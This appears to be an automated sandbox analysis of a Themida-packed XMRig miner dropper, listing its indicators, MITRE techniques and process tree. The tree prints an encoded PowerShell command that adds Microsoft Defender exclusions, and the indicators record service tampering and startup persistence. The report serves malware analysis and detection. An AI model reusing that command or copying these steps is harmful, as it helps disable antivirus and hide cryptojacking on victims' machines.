xmrig | 00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea

Analysis

max time kernel
301s
max time network
297s
platform
windows7_x64
resource
win7-20220414-en
submitted
28-06-2022 22:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe
Size

7.4MB
MD5

360b1e11f8ab2a718f56a4fe23f9c846
SHA1

4be3649ba2def716aa970e2b84b7e4b12215cf85
SHA256

00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea
SHA512

4b111c5116c8636e0d374abf83b489a4d04bb3eb71bd624051aaafeeb6f2cb41ae717fda875c51f558a957b811818729e51f32cfb391a8c5a99c23b3486c7795

Score

10^/10

xmrig discovery evasion exploit miner themida trojan

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

setup.exeupdater.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ setup.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe

XMRig Miner Payload 13 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1316-168-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/1316-172-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/1316-170-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/1316-173-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/1316-174-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/1316-176-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/1316-179-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/1316-180-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/1316-182-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/1316-184-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/1316-178-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/1316-186-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/1316-193-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig

Drops file in Drivers directory 1 IoCs

Processes:

conhost.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe
Executes dropped EXE 1 IoCs

Processes:

setup.exe

pid process

932 setup.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

920 takeown.exe
1088 icacls.exe
1660 takeown.exe
836 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

pid	process
932	setup.exe

pid	process
920	takeown.exe
1088	icacls.exe
1660	takeown.exe
836	icacls.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

setup.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe

Drops startup file 2 IoCs

Processes:

cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lol.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lol.bat	cmd.exe

Loads dropped DLL 1 IoCs

Processes:

00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe

pid process

1884 00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

920 takeown.exe
1088 icacls.exe
1660 takeown.exe
836 icacls.exe

pid	process
1884	00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe

pid	process
920	takeown.exe
1088	icacls.exe
1660	takeown.exe
836	icacls.exe

Themida packer 8 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
\Windows\Temp\setup.exe	themida
C:\Windows\Temp\setup.exe	themida
behavioral1/memory/932-61-0x0000000000400000-0x000000000106D000-memory.dmp	themida
behavioral1/memory/932-65-0x0000000000400000-0x000000000106D000-memory.dmp	themida
behavioral1/memory/932-67-0x0000000000400000-0x000000000106D000-memory.dmp	themida
behavioral1/memory/300-109-0x0000000000400000-0x000000000106D000-memory.dmp	themida
behavioral1/memory/300-111-0x0000000000400000-0x000000000106D000-memory.dmp	themida
behavioral1/memory/300-113-0x0000000000400000-0x000000000106D000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

setup.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA setup.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

setup.exeupdater.exe

pid process

932 setup.exe
300 updater.exe

pid	process
932	setup.exe
300	updater.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

conhost.exe

description	pid	process	target process
PID 628 set thread context of 1184	628	conhost.exe	conhost.exe
PID 628 set thread context of 1316	628	conhost.exe	explorer.exe

Drops file in Program Files directory 1 IoCs

Processes:

conhost.exe

description ioc process

File created C:\Program Files\Google\Libs\WR64.sys conhost.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1396 sc.exe
912 sc.exe
300 sc.exe
628 sc.exe
1440 sc.exe
1556 sc.exe
1656 sc.exe
1184 sc.exe
1260 sc.exe
1560 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

868 schtasks.exe

description	ioc	process
File created	C:\Program Files\Google\Libs\WR64.sys	conhost.exe

pid	process
1396	sc.exe
912	sc.exe
300	sc.exe
628	sc.exe
1440	sc.exe
1556	sc.exe
1656	sc.exe
1184	sc.exe
1260	sc.exe
1560	sc.exe

pid	process
868	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 46 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "363226701"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 0052d9714d8bd801	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8E47D291-F740-11EC-A1EE-66AE473A865F} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\DOMStorage	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000962422cf799f2f46a7e75b376cef3c3c0000000002000000000010660000000100002000000009087d1225c991a4bb587cfd164ba0ab0bc3fa38326a1e9a996052ae5db8eba2000000000e8000000002000020000000df11a05a3ad8a6045a6740eb229f1a07f34f49b31ffdd56f47e0c0e7ccb107ab2000000009998d8dac07de004f42cdf4e1a6c9eaed9d08e87d1064d7d960ff6de2e2c09a40000000119e8a91145eecd7fceb0003bfd1c41727eb9e247c6fd5abe48e75a0d1413fbaad815a9b0fd68f34204f4cc9584eb56296b6fa765b0be15b8b67f0fe519677ca	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\Total = "16"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\ = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\Total = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000962422cf799f2f46a7e75b376cef3c3c000000000200000000001066000000010000200000006327610d4246404c69f9a9ce7bb5d707928d62729791fbfaf56fb85e1ada20e4000000000e800000000200002000000033eb0a564fd654c936e0ae979f26d1d210355e23871548aaaac4afe168d46d63900000006b39807b46bd7289e8e57311db45e41ed0f8e70b064ec46fe9622402d8b419320cbe095462d5b8b893a1f64a4cc707c7dcf02156c35429f1b0c6d81c2dd58decd5a580d7c89fe8643f87a289c21740b0bafcfd41310b36ed70729dc26a16befadf109c80e02fdc402ef4e03ce4181c88aeac950bd47f9a7e634c56b05528c220bacac8c2cb50ad9cb4adef988fc7287940000000ccbb682902a546119dd8f25dc13c251af897dd57ee53dc0e8b36a79d66db3254401b6a8cb57781fcf366285e1df86513392d1de18a53839e30babc5ddf30a71b	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "16"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\NumberOfSubdomains = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\ = "16"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

conhost.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 183bf7704d8bd801	powershell.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
1892	reg.exe
1608	reg.exe
1776	reg.exe
1112	reg.exe
1396	reg.exe
1220	reg.exe
1632	reg.exe
804	reg.exe
1112	reg.exe
1432	reg.exe
1132	reg.exe
828	reg.exe
1396	reg.exe
368	reg.exe
856	reg.exe
1776	reg.exe
836	reg.exe
1576	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.execonhost.exeexplorer.exe

pid	process
912	powershell.exe
1592	powershell.exe
628	conhost.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe
1316	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

464

pid	process
464

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	912	powershell.exe
Token: SeShutdownPrivilege	572	powercfg.exe
Token: SeShutdownPrivilege	912	powercfg.exe
Token: SeShutdownPrivilege	1980	powercfg.exe
Token: SeShutdownPrivilege	1168	powercfg.exe
Token: SeTakeOwnershipPrivilege	920	takeown.exe
Token: SeDebugPrivilege	1592	powershell.exe
Token: SeDebugPrivilege	628	conhost.exe
Token: SeShutdownPrivilege	828	powercfg.exe
Token: SeShutdownPrivilege	1256	powercfg.exe
Token: SeShutdownPrivilege	1268	powercfg.exe
Token: SeShutdownPrivilege	548	powercfg.exe
Token: SeTakeOwnershipPrivilege	1660	takeown.exe
Token: SeLockMemoryPrivilege	1316	explorer.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

980 iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

980 iexplore.exe
980 iexplore.exe
1588 IEXPLORE.EXE
1588 IEXPLORE.EXE
1588 IEXPLORE.EXE
1588 IEXPLORE.EXE

pid	process
980	iexplore.exe

pid	process
980	iexplore.exe
980	iexplore.exe
1588	IEXPLORE.EXE
1588	IEXPLORE.EXE
1588	IEXPLORE.EXE
1588	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.execmd.exeiexplore.exesetup.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1884 wrote to memory of 932	1884	00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe	setup.exe
PID 1884 wrote to memory of 932	1884	00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe	setup.exe
PID 1884 wrote to memory of 932	1884	00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe	setup.exe
PID 1884 wrote to memory of 932	1884	00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe	setup.exe
PID 1884 wrote to memory of 300	1884	00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe	cmd.exe
PID 1884 wrote to memory of 300	1884	00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe	cmd.exe
PID 1884 wrote to memory of 300	1884	00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe	cmd.exe
PID 1884 wrote to memory of 300	1884	00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe	cmd.exe
PID 1884 wrote to memory of 1432	1884	00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe	cmd.exe
PID 1884 wrote to memory of 1432	1884	00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe	cmd.exe
PID 1884 wrote to memory of 1432	1884	00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe	cmd.exe
PID 1884 wrote to memory of 1432	1884	00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe	cmd.exe
PID 1432 wrote to memory of 980	1432	cmd.exe	iexplore.exe
PID 1432 wrote to memory of 980	1432	cmd.exe	iexplore.exe
PID 1432 wrote to memory of 980	1432	cmd.exe	iexplore.exe
PID 1432 wrote to memory of 980	1432	cmd.exe	iexplore.exe
PID 980 wrote to memory of 1588	980	iexplore.exe	IEXPLORE.EXE
PID 980 wrote to memory of 1588	980	iexplore.exe	IEXPLORE.EXE
PID 980 wrote to memory of 1588	980	iexplore.exe	IEXPLORE.EXE
PID 980 wrote to memory of 1588	980	iexplore.exe	IEXPLORE.EXE
PID 932 wrote to memory of 1932	932	setup.exe	conhost.exe
PID 932 wrote to memory of 1932	932	setup.exe	conhost.exe
PID 932 wrote to memory of 1932	932	setup.exe	conhost.exe
PID 932 wrote to memory of 1932	932	setup.exe	conhost.exe
PID 1636 wrote to memory of 912	1636	cmd.exe	powershell.exe
PID 1636 wrote to memory of 912	1636	cmd.exe	powershell.exe
PID 1636 wrote to memory of 912	1636	cmd.exe	powershell.exe
PID 2000 wrote to memory of 1260	2000	cmd.exe	sc.exe
PID 2000 wrote to memory of 1260	2000	cmd.exe	sc.exe
PID 2000 wrote to memory of 1260	2000	cmd.exe	sc.exe
PID 2000 wrote to memory of 300	2000	cmd.exe	sc.exe
PID 2000 wrote to memory of 300	2000	cmd.exe	sc.exe
PID 2000 wrote to memory of 300	2000	cmd.exe	sc.exe
PID 2000 wrote to memory of 628	2000	cmd.exe	sc.exe
PID 2000 wrote to memory of 628	2000	cmd.exe	sc.exe
PID 2000 wrote to memory of 628	2000	cmd.exe	sc.exe
PID 2000 wrote to memory of 1560	2000	cmd.exe	sc.exe
PID 2000 wrote to memory of 1560	2000	cmd.exe	sc.exe
PID 2000 wrote to memory of 1560	2000	cmd.exe	sc.exe
PID 2000 wrote to memory of 1440	2000	cmd.exe	sc.exe
PID 2000 wrote to memory of 1440	2000	cmd.exe	sc.exe
PID 2000 wrote to memory of 1440	2000	cmd.exe	sc.exe
PID 2000 wrote to memory of 804	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 804	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 804	2000	cmd.exe	reg.exe
PID 1184 wrote to memory of 572	1184	cmd.exe	powercfg.exe
PID 1184 wrote to memory of 572	1184	cmd.exe	powercfg.exe
PID 1184 wrote to memory of 572	1184	cmd.exe	powercfg.exe
PID 2000 wrote to memory of 1112	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 1112	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 1112	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 1892	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 1892	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 1892	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 828	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 828	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 828	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 1776	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 1776	2000	cmd.exe	reg.exe
PID 2000 wrote to memory of 1776	2000	cmd.exe	reg.exe
PID 1184 wrote to memory of 912	1184	cmd.exe	powercfg.exe
PID 1184 wrote to memory of 912	1184	cmd.exe	powercfg.exe
PID 1184 wrote to memory of 912	1184	cmd.exe	powercfg.exe
PID 1184 wrote to memory of 1980	1184	cmd.exe	powercfg.exe

C:\Users\Admin\AppData\Local\Temp\00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe
"C:\Users\Admin\AppData\Local\Temp\00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1884

C:\Windows\Temp\setup.exe
"C:\Windows\Temp\setup.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:932

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
3⤵
PID:1932

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG4AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABhAHoAIwA+AA=="
4⤵
- Suspicious use of WriteProcessMemory
PID:1636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAG4AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABhAHoAIwA+AA=="
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:912

C:\Windows\System32\cmd.exe
